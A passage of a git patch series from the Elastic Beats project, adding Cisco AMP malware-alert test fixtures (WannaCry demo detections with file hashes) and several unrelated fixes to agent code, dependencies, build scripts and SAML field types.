"amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 22729, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 2980, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:58:54.000Z", "cisco.amp.computer.active": true, @@ -1012,6 +1201,59 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419187537109057560", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 884000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419187537109058000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 25859, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:49:08.000Z", "cisco.amp.computer.active": true, @@ -1221,6 +1463,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:28:45.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.FCE5B6784D-100.SBX.TG", + "cisco.amp.detection_id": "6533671595485954049", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 899000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671595485954000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "5df0c4ebca109779dc8afc745d612637", + "file.hash.sha1": "bdb11107a33eaeded6a838eb2a0e6167637dbe9c", + "file.hash.sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "file.name": "pp32.exe", + "file.path": "\\\\?\\C:\\pp32.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 31671, + "related.hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "5df0c4ebca109779dc8afc745d612637", + "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:26:38.000Z", "cisco.amp.computer.active": true, @@ -1276,6 +1581,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179222052372503", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 437000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179222052372000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34184, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:26:37.000Z", "cisco.amp.computer.active": true, @@ -1441,6 +1809,69 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179217757405206", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 797000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 39029, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T11:26:37.000Z", "cisco.amp.computer.active": true, @@ -1931,6 +2362,79 @@ "forwarded" ] }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 50398, + "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 3020, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, { "@timestamp": "2021-01-14T10:59:33.000Z", "cisco.amp.computer.active": true, From c2b70d015b0b7ac8feae5909fc54ab77f20d929d Mon Sep 17 00:00:00 2001 From: Michal Pristas Date: Thu, 25 Mar 2021 17:09:23 +0100 Subject: [PATCH 14/20] [Ingest Manager] Fix nil pointer for nil list item (#24760) (#24766) [Ingest Manager] Fix nil pointer for nil list item (#24760) --- x-pack/elastic-agent/CHANGELOG.next.asciidoc | 1 + .../pkg/agent/program/testdata/single_config.yml | 2 ++ x-pack/elastic-agent/pkg/agent/transpiler/ast.go | 7 +++++++ 3 files changed, 10 insertions(+) diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index 2a2e6184c8b3..e6d73a788fb3 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -44,6 +44,7 @@ - Fix docker enrollment issue related to Fleet Server change. {pull}24155[24155] - Improve log on failure of Endpoint Security installation. {pull}24429[24429] - Verify communication to Kibana before updating Fleet client. {pull}24489[24489] +- Fix nil pointer when null is generated as list item. {issue}23734[23734] ==== New features diff --git a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml index fb585dae996f..006db1e9f524 100644 --- a/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml +++ b/x-pack/elastic-agent/pkg/agent/program/testdata/single_config.yml @@ -40,6 +40,8 @@ inputs: use_output: default streams: - metricset: status + processors: + - null data_stream: dataset: docker.status - metricset: info diff --git a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go index cfb02d1660ac..1ae1066c8c6e 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/ast.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/ast.go @@ -126,7 +126,11 @@ func (d *Dict) Value() interface{} { func (d *Dict) Clone() Node { nodes := make([]Node, 0, len(d.value)) for _, i := range d.value { + if i == nil { + continue + } nodes = append(nodes, i.Clone()) + } return &Dict{value: nodes} } @@ -350,6 +354,9 @@ func (l *List) Value() interface{} { func (l *List) Clone() Node { nodes := make([]Node, 0, len(l.value)) for _, i := range l.value { + if i == nil { + continue + } nodes = append(nodes, i.Clone()) } return &List{value: nodes} From a1559f42b3609e66e431a6df49df8165c5c0a78a Mon Sep 17 00:00:00 2001 From: Mariana Dima Date: Fri, 26 Mar 2021 11:48:52 +0000 Subject: [PATCH 15/20] Cherry-pick #24502 to 7.12: Update gosigar package after fix (#24627) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Update gosigar package after fix (#24502) * mofidy doc * work on fix * update changelog * update notice * Update notice * [Ingest Manager] Sync on rename on windows (#24504) * Add tests for encoding settings of filestream input (#24426) * [Elastic Agent] Add the ability to provide custom CA's inside of docker. (#24486) * Add the ability to provide custom CA's for Elastic Agent docker. * Add changelog. * Update Golang to 1.15.9 (#24442) * Add syntax for multiple selector logging (#24207) (#24497) * Add syntax for multiple selector logging * Update libbeat/docs/loggingconfig.asciidoc Co-authored-by: EamonnTP Co-authored-by: EamonnTP Co-authored-by: AndyHunt66 * chore(ci): use beat_version instead of PR version (#24446) * Add test for close.reader.after_interval to filestream input (#24423) * Refactor use of system.hostfs to fix cgroup metrics (#24334) * refactor use of system.hostfs to fix cgroup metrics * add changelog * remove comment * add cfgwarn * move changelog * shift around CLI config location and rep warning * add comment about system.hostfs usage * update docs * capitalization * fix grammar, add conditional * change docs phrasing * [Elastic Agent] Add verification check when updating communication to Kibana. (#24489) * Add verification check when updating communication to Kibana. * Add changelog. * Add const. * Fix typo in mqtt input docs (#24509) * Update input-http-endpoint.asciidoc (#24490) * [Ingest Manager] Move logging defaults to agent (#24535) [Ingest Manager] Move logging defaults to agent (#24535) * Clarify that the Tomcat module is for ingesting access logs (#24543) The Tomcat module is for ingesting access logs, not Catalina or localhost logs. * [Auditbeat] btmp offset check (#24515) * auditbeat btmp offset check Add check that saved offset is not larger than the current file size to prevent seeking past the end of file * [Heartbeat] Produce error rather than panic on missing source (#24404) Fixes #24403. With the changes to the heartbeat config syntax in 7.12 the `source` field is now required. Our config validation code didn't actually check for this field's presence, which caused an NPE. This PR adds a validation checking for that config's presence. It also adds tests for the validation code for config sub-fields. There were no defects found in the validations for source.inline, or source.browser, but a few tests were missing. Instead of the panic seen in #24403 users will now get the error seen below. ``` 2021-03-05T15:41:40.146-0600 ERROR instance/beat.go:952 Exiting: could not create monitor: job err could not parse suite config: config 'source' must be specified for this monitor, if upgrading from a previous experimental version please see our new config docs accessing 'heartbeat.monitors.0' (source:'sample-synthetics-config/heartbeat.yml') Exiting: could not create monitor: job err could not parse suite config: config 'source' must be specified for this monitor, if upgrading from a previous experimental version please see our new config docs accessing 'heartbeat.monitors.0' (source:'sample-synthetics-config/heartbeat.yml') ``` * Fix default scope in add_nomad_metadata (#24559) Fix default scope in add_nomad_metadata. It is set to local, but it should be node. Fix also error message that showed that local is a valid value. * [Filebeat] Add Dashboards to Threat Intel Module (#24488) * added dashboards & docs * ran mage fmt update * [CI] bump gvm version and use the binary (#24571) * [CI] Add resilience when installing required tooling (#24542) * [CI] enable new flaky detector (#24464) * chore: do not pass beat version (#24586) We will be delegating the version calculation to the e2e tests, using target branch values as defaults Co-authored-by: Jaime Soriano Pastor Co-authored-by: Michal Pristas Co-authored-by: Noémi Ványi Co-authored-by: Blake Rouse Co-authored-by: EamonnTP Co-authored-by: AndyHunt66 Co-authored-by: Manuel de la Peña Co-authored-by: Alex K <8418476+fearful-symmetry@users.noreply.github.com> Co-authored-by: DeDe Morton Co-authored-by: Lee Hinman <57081003+leehinman@users.noreply.github.com> Co-authored-by: Andrew Cholakian Co-authored-by: Andrew Pease <7442091+peasead@users.noreply.github.com> Co-authored-by: Victor Martinez (cherry picked from commit 5c6f1b637745845f04ecdee79d9ecf9f3d18054d) * upadte changelog --- CHANGELOG.next.asciidoc | 1 + NOTICE.txt | 4 ++-- go.mod | 2 +- go.sum | 4 ++-- 4 files changed, 6 insertions(+), 5 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 9574394aea85..db71b9b8d66c 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -264,6 +264,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix remote_write flaky test. {pull}21173[21173] - Remove io.time from windows {pull}22237[22237] - Fix `logstash` module when `xpack.enabled: true` is set from emitting redundant events. {pull}22808[22808] +- Ignore unsupported derive types for filesystem metricset. {issue}22501[22501] {pull}24502[24502] *Packetbeat* diff --git a/NOTICE.txt b/NOTICE.txt index dcae67f62f1d..ed4f2cb34231 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -8299,11 +8299,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-ucfg@v0.8.3/ -------------------------------------------------------------------------------- Dependency : github.com/elastic/gosigar -Version: v0.14.0 +Version: v0.14.1 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.0/LICENSE: +Contents of probable licence file $GOMODCACHE/github.com/elastic/gosigar@v0.14.1/LICENSE: Apache License Version 2.0, January 2004 diff --git a/go.mod b/go.mod index 6575cc2ab04f..e8855bce0fcb 100644 --- a/go.mod +++ b/go.mod @@ -73,7 +73,7 @@ require ( github.com/elastic/go-txfile v0.0.7 github.com/elastic/go-ucfg v0.8.3 github.com/elastic/go-windows v1.0.1 // indirect - github.com/elastic/gosigar v0.14.0 + github.com/elastic/gosigar v0.14.1 github.com/fatih/color v1.9.0 github.com/fsnotify/fsevents v0.1.1 github.com/fsnotify/fsnotify v1.4.9 diff --git a/go.sum b/go.sum index 91689b3a18a2..7eef9ed3806c 100644 --- a/go.sum +++ b/go.sum @@ -278,8 +278,8 @@ github.com/elastic/go-ucfg v0.8.3/go.mod h1:iaiY0NBIYeasNgycLyTvhJftQlQEUO2hpF+F github.com/elastic/go-windows v1.0.0/go.mod h1:TsU0Nrp7/y3+VwE82FoZF8gC/XFg/Elz6CcloAxnPgU= github.com/elastic/go-windows v1.0.1 h1:AlYZOldA+UJ0/2nBuqWdo90GFCgG9xuyw9SYzGUtJm0= github.com/elastic/go-windows v1.0.1/go.mod h1:FoVvqWSun28vaDQPbj2Elfc0JahhPB7WQEGa3c814Ss= -github.com/elastic/gosigar v0.14.0 h1:5w470Q8AagzVY8U48ab8rVkQrOXiIK1NHBYWrAxi9kI= -github.com/elastic/gosigar v0.14.0/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= +github.com/elastic/gosigar v0.14.1 h1:T0aQ7n/n2ZA9W7DmAnj60v+qzqKERdBgJBO1CG2W6rc= +github.com/elastic/gosigar v0.14.1/go.mod h1:iXRIGg2tLnu7LBdpqzyQfGDEidKCfWcCMS0WKyPWoMs= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877 h1:C9LsbipColsz04JKpKoLlp0pgMJRLq2uXVTeKRDcNcY= github.com/elastic/sarama v1.19.1-0.20210120173147-5c8cb347d877/go.mod h1:g5s5osgELxgM+Md9Qni9rzo7Rbt+vvFQI4bt/Mc93II= github.com/elazarl/goproxy v0.0.0-20180725130230-947c36da3153 h1:yUdfgN0XgIJw7foRItutHYUIhlcKzcSf5vDpdhQAKTc= From 50382d6e0c6a87834204a69a27491c44e029fff3 Mon Sep 17 00:00:00 2001 From: Steffen Siering Date: Fri, 26 Mar 2021 23:35:03 +0100 Subject: [PATCH 16/20] Cherry-pick #24775 to 7.12: Disable rust when preparing the python environment (#24793) When setting up the python environment or upgrading pip the build might fail because rust is not available or recent enough. We set the `CRYPTOGRAPHY_DONT_BUILD_RUST=1` environment variable as mitigation whenever we prepare the python test environment. (cherry picked from commit eb937f076e87b4dd6984c999fd1076193e37ed38) --- dev-tools/common.bash | 4 ++++ dev-tools/mage/pytest.go | 6 ++++++ libbeat/scripts/Makefile | 1 + 3 files changed, 11 insertions(+) diff --git a/dev-tools/common.bash b/dev-tools/common.bash index 72940c0591ec..9439e15e93dc 100644 --- a/dev-tools/common.bash +++ b/dev-tools/common.bash @@ -91,6 +91,10 @@ jenkins_setup() { # Workaround for Python virtualenv path being too long. export TEMP_PYTHON_ENV=$(mktemp -d) + + # Workaround for cryptography package (pip dependency) relying on rust + export CRYPTOGRAPHY_DONT_BUILD_RUST=1 + export PYTHON_ENV="${TEMP_PYTHON_ENV}/python-env" # Write cached magefile binaries to workspace to ensure diff --git a/dev-tools/mage/pytest.go b/dev-tools/mage/pytest.go index e562fdef95bb..f933300f935b 100644 --- a/dev-tools/mage/pytest.go +++ b/dev-tools/mage/pytest.go @@ -192,6 +192,12 @@ func PythonVirtualenv() (string, error) { pythonVirtualenvLock.Lock() defer pythonVirtualenvLock.Unlock() + // When upgrading pip we might run into an error with the cryptography package + // (pip dependency) will not compile if no recent rust development environment is available. + // We set `CRYPTOGRAPHY_DONT_BUILD_RUST=1`, to disable the need for python. + // See: https://github.com/pyca/cryptography/issues/5771 + os.Setenv("CRYPTOGRAPHY_DONT_BUILD_RUST", "1") + // Determine the location of the virtualenv. ve, err := pythonVirtualenvPath() if err != nil { diff --git a/libbeat/scripts/Makefile b/libbeat/scripts/Makefile index 4fd87f32d75b..e6d913ab1f47 100755 --- a/libbeat/scripts/Makefile +++ b/libbeat/scripts/Makefile @@ -267,6 +267,7 @@ load-tests: ## @testing Runs load tests # Sets up the virtual python environment .PHONY: python-env +python-env: export CRYPTOGRAPHY_DONT_BUILD_RUST=1 python-env: ${ES_BEATS}/libbeat/tests/system/requirements.txt @test -e ${PYTHON_ENV}/bin/activate || ${PYTHON_EXE} -m venv ${VENV_PARAMS} ${PYTHON_ENV} @. ${PYTHON_ENV}/bin/activate && pip install ${PIP_INSTALL_PARAMS} -q --upgrade pip ; \ From 4e87326d183e6471e11b3f25164fbfbd1938573e Mon Sep 17 00:00:00 2001 From: Marc Guasch Date: Mon, 29 Mar 2021 14:40:34 +0200 Subject: [PATCH 17/20] Fix saml status code parsing (#24785) (#24808) (cherry picked from commit 18b5f9214a32e33c693dba852a3f97d646907838) --- filebeat/docs/fields.asciidoc | 8 +++--- .../module/google_workspace/fields.go | 2 +- .../google_workspace/saml/_meta/fields.yml | 4 +-- .../google_workspace/saml/config/pipeline.js | 9 +------ .../saml/test/saml-test.json.log | 4 +-- .../test/saml-test.json.log-expected.json | 12 ++++----- x-pack/filebeat/module/gsuite/fields.go | 2 +- .../module/gsuite/saml/_meta/fields.yml | 4 +-- .../module/gsuite/saml/config/pipeline.js | 9 +------ .../saml/test/gsuite-saml-test.json.log | 4 +-- .../gsuite-saml-test.json.log-expected.json | 26 +++++++++---------- 11 files changed, 35 insertions(+), 49 deletions(-) diff --git a/filebeat/docs/fields.asciidoc b/filebeat/docs/fields.asciidoc index c41cc67fb652..0e95952e6b09 100644 --- a/filebeat/docs/fields.asciidoc +++ b/filebeat/docs/fields.asciidoc @@ -66106,7 +66106,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -66116,7 +66116,7 @@ type: long SAML second level status code. -type: long +type: keyword -- @@ -67370,7 +67370,7 @@ type: keyword SAML status code. -type: long +type: keyword -- @@ -67380,7 +67380,7 @@ type: long SAML second level status code. -type: long +type: keyword -- diff --git a/x-pack/filebeat/module/google_workspace/fields.go b/x-pack/filebeat/module/google_workspace/fields.go index a17ca4dd5a47..8ce7b296cf7d 100644 --- a/x-pack/filebeat/module/google_workspace/fields.go +++ b/x-pack/filebeat/module/google_workspace/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGoogleWorkspace returns asset data. // This is the base64 encoded gzipped contents of module/google_workspace. func AssetGoogleWorkspace() string { - return "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